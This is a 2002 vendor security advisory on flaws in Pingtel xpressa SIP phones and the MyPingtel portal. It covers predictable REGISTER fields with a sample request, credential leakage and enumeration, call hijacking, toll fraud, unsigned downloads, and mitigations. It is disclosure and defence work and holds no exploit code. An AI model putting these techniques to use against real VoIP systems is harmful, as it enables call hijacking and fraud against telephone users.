The Sys-Security Group
Security Advisory
"More Vulnerabilities with Pingtel xpressa SIP-based IP Phones"
Release Date: 08/20/2002
Affected Platforms: Pingtel xpressa SIP IP phones model PX-1 with
software version 2.0.1 and below; Pingtel instant xpressa softphones
with software
version 2.0.1 and below
Severity: High
Author: Ofir Arkin ([EMAIL PROTECTED])
Summary
Pingtel (http://www.pingtel.com) develops intelligent Java-based
voice-over-IP phones and softphones for service providers and
enterprises.
Using the vulnerabilities enumerated within this advisory it is possible
to jeopardize critical telephony infrastructure based on Pingtel's
xpressa SIP-based IP phones and softphones. Additionally, certain
vulnerabilities allow an attacker to take complete control over an IP
Phone or a softphone node either directly or by circumventing other SIP
entities on the network by abusing the 'node's credentials'.
The most severe issue discussed is the way an attacker can exploit
vulnerabilities with MyPingtel Portal (http://my.pingtel.com) to subvert
a VoIP infrastructure which includes IP Phones and/or softphones from
Pingtel.
Full Details in PDF format (~500kb):
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with
_Pingtel_xpressa_Phones.pdf
Full Details in HTML format:
http://www.sys-security.com/archive/advisories/html/More_Vulnerabilities
_with_Pingtel_xpressa_Phones.htm
Moderated text version is attached to this email and available from:
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with
_Pingtel_xpressa_SIP-based_IP_phones.txt
Ofir Arkin [[EMAIL PROTECTED]]
Founder
The Sys-Security Group
http://www.sys-security.com
PGP CC2C BE53 12C6 C9F2 87B1 B8C6 0DFA CF2D D360 43FA
For more information: http://www.sys-security.com
Copyright (c) The Sys-Security Group 2002, all rights reserved.
The Sys-Security Group
Security Advisory
"More Vulnerabilities with Pingtel xpressa SIP-based IP phones"
Release Date: 08/20/2002
Affected Platforms: Pingtel xpressa SIP-based IP phones model PX-1 with software
version 2.0.1 and below; Pingtel instant xpressa softphones with software
version 2.0.1 and below
Severity: High
Authors: Ofir Arkin ([EMAIL PROTECTED])
Summary
Pingtel (http://www.pingtel.com) develops intelligent Java-based voice-over-IP
phones and softphones for service providers and enterprises.
Using the vulnerabilities enumerated within this advisory it is possible to
jeopardize critical telephony infrastructure based on Pingtel's xpressa
SIP-based IP phones and softphones. Additionally, certain vulnerabilities allow
an attacker to take complete control over an IP Phone or a softphone node either
directly or by circumventing other SIP entities on the network by abusing the
'node's credentials'.
The most severe issue discussed is the way an attacker can exploit
vulnerabilities with MyPingtel portal (http://my.pingtel.com) to subvert a VoIP
infrastructure which includes IP Phones and/or softphones from Pingtel.
Background Information
Please see the full advisory available from the Sys-Security Group's web site for
more information on VoIP, SIP, and SIP Registrar's.
A PDF is available from: http://www.sys-security.com/archive/advisories/
More_Vulnerabilities_with_Pingtel_xpressa_Phones.pdf
An HTML version is available from: http://www.sys-security.com/archive/
advisories/html/More_Vulnerabilities_with_Pingtel_xpressa_Phones.htm
The Vulnerabilities
A. Predictable Parameter Values with SIP REGISTER requests sent from Pingtel's
IP Phones
The following is a SIP REGISTER request sent from a Pingtel SIP-based IP Phone
to a SIP Registrar SERVER:
REGISTER sip:192.168.1.57 SIP/2.0
To: sip:[EMAIL PROTECTED]
From: sip:[EMAIL PROTECTED];tag=456248
Call-ID: [EMAIL PROTECTED]
CSeq: 1 REGISTER
Contact: sip:[EMAIL PROTECTED]
Expires: 3600
Content-Length: 0
Accept-Language: en
Supported: sip-cc, sip-cc-01, timer
User-Agent: Pingtel/1.2.6 (VxWorks)
Via: SIP/2.0/UDP 192.168.1.59
The values required to subvert a registration which are used by the request are
all predictable. The "Call-ID" is fixed (with another Pingtel IP phones it was
always fixed to "9-reg@myIP"), the sequence number sent is 1 (so setting it to
any higher number would be sufficient), the "To" and "From" SIP URIs are also
predictable allowing a remote attacker to circumvent the SIP Registrar and
write any bindings to the location service remotely (if no authentication is
required).
Although authentication will be required in some cases, requiring the attacker
to have the right credentials for the user before having the ability to
circumvent the SIP Registrar and to write false records into the location
service, there are a number of ways to extract the username and password from
a Pingtel SIP-based IP phone, some outlined in this advisory some in other[1].
B. Compromising VoIP infrastructure using the MyPingtel Portal
MyPingtel is a Portal (http://my.pingtel.com) for one to use and manage his
Pingtel xpressa softphone or IP phone. The MyPingtel web site can be used to:
"Learn about new applications and services and install them from your
PC. Create and manage your speed dial phone book using the PC
keyboard. Set your call handling preferences for call forwarding when
you're away from the phone and on the phone. Get tips and online help
for using your phone. Stay current with news from Pingtel..."
In order to use the application/Portal, a user needs to register his Pingtel
xpressa SIP-based IP phone with the MyPingtel Portal. This is done in two
stages: A user needs to register to Pingtel's Portal, and than the user needs
to register his IP phone (physically accessing the IP phone) using the details
(and credentials) he supplied when registering with Pingtel's Portal.
This first stage is simply accomplished by browsing to http://my.pingtel.com
and filling the required registration form[2].
The user's credentials supplied to Pingtel's Portal with the registration
process must be a valid username and password that allows the registering user
to login to his IP phone via the web server interface of his IP Phone.
The next step would be to use the MyPingtel Sign-In application, which is
supplied by default with Pingtel's IP phone and softphone, to register the IP
phone, physically accessing the phone. This is simply done by pressing:
More -> MyPingtel Sign-In -> Next -> [Enter your username] ->
[Enter your password] -> OK -> [Enter Admin Password] ->
[Enter Phone Name] -> Next -> OK
A message will be displayed confirming the registration[3].
B.1 E.T. Phones Home - Information Leakage leading to the compromise of the IP
Phone
When the IP phone (or softphone) boot-up, the IP phone will send all
registration information to Pingtel's MyPingtel Portal (http://my.pingtel.com)
utilizing the HTTP protocol. The information sent to Pingtel's Portal will
include the following:
- Admin name in clear text
- Admin Password in MD5 hash
- Mac Address in clear text
- Physical Password in MD5 hash
- Admin Domain in clear text
- IP Address of the IP phone in clear text
- Web Server Port in clear text
- And other information
Any malicious party able to extract this information from the wire (upstream
to Pingtel, local network to the phone, intermediate network, etc.) will have
the ability to brute force the user's password offline. This might be done
utilizing the same hashing/crypto algorithm used. A malicious party might
choose to actively brute force the password either against the IP phone's web
server or utilizing Pingtel's Portal.
The value of the information is even greater when the IP address of the IP
phone is routable from the Internet. This will allow a remote attacker to
connect to the IP phone's web server remotely (the web server access is
required for the operation of MyPingtel Portal) either directly or through
MyPingtel Portal using the credentials he extracted.
Although administrator access is needed to circumvent some of the IP phone's
features (the username is "admin" and the out-of-the-box password is clear)
having a valid username and password would allow a malicious party to circumvent
the "Call Handling" features of the IP phone, such as the various "Call
Forwarding" features[4].
B.2 E.T. Get's a Call - Information Leakage leading to the compromise of the IP
Phone
To use Pingtel's Portal one needs to supply his username and password. The web
page is composed of 2 parts. The left part contains a login page which is using
HTTP over SSL (HTTPS), where the right part of the page is simply a list of
application and other miscellaneous pieces of information.
B.2.1 Username and password enumeration using the http://my.pingtel.com Web
Site
The problems starts even before successfully authenticating to the web site
since the web site will be kind enough to tell you if the username exists or
not... and of course when the password is wrong...
This will allow any malicious party to actively enumerate any user ever
registered to MyPingtel Portal as well as his password (no account lockout
policy seems to be in place).
B.2.2 What a successful authentication can bring...
If the authentication to Pingtel's Portal is successful, MyPingtel Portal will
send an authentication request to the authenticated user's IP phone's web
server with the user's credentials (the same credentials used to logon to the
Portal). Since the IP Phone sent its IP address and web server port number,
among other pieces of data, to the Portal when a user registered its IP phone
to MyPingtel services (and automatically after every boot-up if no changes are
made), the Portal will have the knowledge to which IP address to send the
authentication request to.
The problem is that the Pingtel xpressa SIP-based IP Phone's (and softphone's)
web server is only able to receive (and handle) HTTP BASIC authentication (Base
64). Any malicious party able to extract this information from the wire
(downstream to Pingtel, local network to the phone, intermediate network, etc.)
will have the username and password of a legitimate user for that particular IP
phone.
The value of the information is even greater when the IP address of the IP
phone is routable from the Internet. This will allow a remote attacker to
connect to the IP phone's web server remotely (the web server access is
required for the operation of MyPingtel Portal) either directly or through
MyPingtel Portal using the credentials he extracted.
Although administrator access is needed to circumvent some of the IP phone's
features (the username is "admin" and the out-of-the-box password is clear)
having a valid username and password would allow a malicious party to
circumvent the "Call Handling" features of the IP phone, such as the various
"Call Forwarding" features[5].
C. Onto the Critical Path
With the Pingtel xpressa SIP-based IP phones and softphones there are a number
of instances where user credentials will be required to be presented, for
example:
- When a non-privileged user or an "admin" wishes to use the IP phone's
web server to manage some of the IP phone's functionality.
- When outgoing SIP requests will have to be authenticated against the
targeted SIP entity before the entity will be willing to process the
requests.
The Pingtel xpressa SIP-based IP phone is able to have two different sets of
credentials for any user for those scenarios. One set of user credentials
allowing a user to use the IP phone's web server, and another to authenticate
the SIP requests the IP phone will make on behalf of that user targeting
different SIP entities within the VoIP network.
Unfortunately the documentation with Pingtel's xpressa SIP-based IP phones and
softphones does not make the appropriate distinction between the different
cases and does not highlight the enormous security hazards associated[6].
Therefore I believe that with several deployments of Pingtel's xpressa
SIP-based IP phones the credentials information was set the same for a user to
logon to the IP phone's web server and for authentication information for
outgoing SIP requests.
The same credentials used for outgoing SIP requests and for accessing the
IP phone's web server will also be those who will be provided as part of the
registration process to MyPingtel Portal. This is since a user is not able to
deploy another IP phone user unless he has the "admin" password. Therefore a
user will be limited to use his login name and password, used to login to the
IP phone's web server (and in most of the cases to authenticate outgoing SIP
requests), to register to MyPingtel Portal allowing him to be able to
successfully authenticate to the web server after authenticating to MyPingtel
Portal.
This will lead to the following scenario:
The authentication credentials the Pingtel xpressa SIP-based IP phone will be
required to present when it will be needed to authenticate a call request or a
registration request to a SIP entity (or entities) within the VoIP network the
Pingtel IP phone is part of, will be the same credentials used for the
MyPingtel Portal and the MyPingtel Sign-In application on the IP phone!.
A malicious party able to extract the credentials from the MyPingtel Portal,
using one of the methods presented within this advisory, will be able to pass
any authentication required by any SIP entity for the particular user!
The potential risk is devastating for the VoIP network where any authentication
required in order to block misuse of the network can now be easily bypassed:
- Using a user's credentials a malicious attacker will be able to
successfully authenticate to the SIP Registrar server and make
changes to the binding information stored in the location service
for that particular user.
This fault combined with the ability to predict SIP REGISTER request
parameters sent from Pingtel SIP-based IP Phones and softphones leads
to the total control of the binding information for a particular user.
This will allow, among other things, for a malicious party to
associate the user's SIP or SIPS URI with an IP address or a hostname
which do not represent the IP Phone. In other words it would allow a
malicious party to perform "Call Hijacking" in a very easy manner
even remotely!
- Abusing the SIP Registrar server would allow a malicious party to
forward incoming call requests outside of the organization using
Pingtel's xpressa SIP-based IP Phones which its nodes and credentials
were compromised.
- When a user places a call, he might need to provide authentication
information in order to be allowed to place the call. This is
usually performed for the user by its IP Phone where the user's
username and password are stored and used when needed. Since the
user's credentials are compromised, a malicious party will be able to
use the credentials he extracted to make free phone calls using the
VoIP network the Pingtel xpressa SIP-based IP phone(s) belongs to.
- Etc.
D. More Issues
There are more, less severe issues I have found with Pingtel's xpressa IP
phones and softphones which are listed below allowing people to understand what
they are exposed to.
D.1 Availability - Random Reboots of the IP Phone
Using a Pingtel xpressa SIP-based IP Phone I have encountered situations were
the IP phone have rebooted out-of-the-blue. There was no attack lunched on the
phone, and the network traffic was HTTP, HTTPS, POP3 and SMTP only.
Although this was not observed in small intervals, still the availability of
the IP phone, which is sometimes regarded as critical infrastructure, is at
risk.
I do feel it is not my role to perform various tests against the IP phone in
order to determine the exact cause of the random reboots. This is something I
save for Pingtel and WindRiver (manufactures of the VxWorks platform).
D.2 No verification of downloaded software
As part of the IP phone's boot up process the IP phone will fetch several JAVA
applications from Pingtel's web site. There are no verification checks against
the downloaded software resulting in a possibility for anyone circumventing DNS
records to try to "feed" the IP Phone with the wrong application (malicious?).
D.3 User Enumeration by Physically Accessing the IP phone
If physical access is gained to the phone, a malicious party will be able to
view the username one is using for his IP phone if using the MyPingtel Sign-In
application simply by pressing:
More -> MyPingtel Sign-In
If the user is using MyPingtel Sign-In application a message will be displayed
alerting the IP phone is already signed-in to MyPingtel displaying the current
signed-in login name and the server it is connected to.
This information should be hidden.
D.4 Hard coded usernames and passwords within web pages served with MyPingtel
Portal
Although the login to MyPingtel Portal is done securely using HTTPS, any
malicious user using a workstation previously used by a legitimate MyPingtel
Portal user, will be able to, by pressing the browser's back button and viewing
the web page source, see in clear text, the user's username and password as
well as the IP Phone's IP address...
Temporary Solution
There are a number of risk mitigation network configurations a VoIP network
administrator might do in order to mitigate some of the risk involved with
using Pingtel's xpressa SIP-based IP phones and softphones on his network:
Issues related the configuration and usage of the IP phones:
- Deploy users using the IP Phone's admin GUI in a lab environment
BEFORE issuing the IP phone's to your users
- Change the "admin" password on the IP phones. Remember - the default
is blank!
- Shut down the Pingtel xpressa IP phone's web server after initial
setup if this function is not required or used by your users
- Configure different credentials set for each user for:
- Outgoing SIP requests that needs to be authenticated, and for
- Web Server logon for managing some of the IP phone's abilities
- Do not disclose the credentials needed to authenticate the outgoing
SIP requests to your users!
- Do not perform remote management tasks using the Pingtel xpressa IP
phone's web server since authentication is literally in clear text!
Issued related to MyPingtel Portal:
- Do not allow your users to use the MyPingtel Portal (actively block
this with the appropriate access controls on your network filtering
devices until the issues with this advisory are resolved), they can
directly access their Pingtel xpressa IP phone's locally. Educate
them how to do that!
- Do not allow your users to use the MyPingtel Sign-In application on
their Pingtel xpressa SIP-based IP phones (actively block this with
the appropriate access controls on your network filtering devices
until the issues with this advisories are resolved)
- Block access to http://my.pingtel.com
General Issues:
- Block access to your SIP Registrar server from the Internet (and from
other networks that should not access it)
- Make your VoIP network non-routable for users coming from the Internet
- Do not allow any access to your VoIP infrastructure from the Internet
Other type of solutions should be provided by Pingtel.
Conclusion
MyPingtel Portal does not take security into account which might lead to a
total compromise of any VoIP network using the MyPingtel Portal with Pingtel's
SIP-based IP phones and softphones. This is a direct result of the lack of
proper security centric documentation, understanding, and education on the part
of Pingtel.
This is another example how a new-comer technology still needs to go through
several cycles before it might be regarded as "ok" to use regarding its
security risks.
[1] Ofir Arkin & Joshua Anderson: Multiple Vulnerabilities with Pingtel xpressa
SIP Phones July 12, 2002. Available from: http://www.sys-security.com/archive/
advisories/a071202-1.txt
[2] Although I have previously indicated to Pingtel that the information
entered is not validated against any record of sale or other, it is still
possible for anyone to register with completely fake information and be able to
receive the services from the Portal.
[3] When entering the password for the MyPingtel user, the last digit will be
displayed for ever on the instant xpressa softphones making shoulder surfing
even easier than ever before.
[4] Please see section C for more hazards
[5] Please see section C for more hazards.
[6] Pingtel's own "Best Practices for Deploying Pingtel phones" document
(http://www.pingtel.com/docs/best_practices_20x.txt) does not address this
issue.
For more information: http://www.sys-security.com
Copyright (c) The Sys-Security Group 2002, all rights reserved
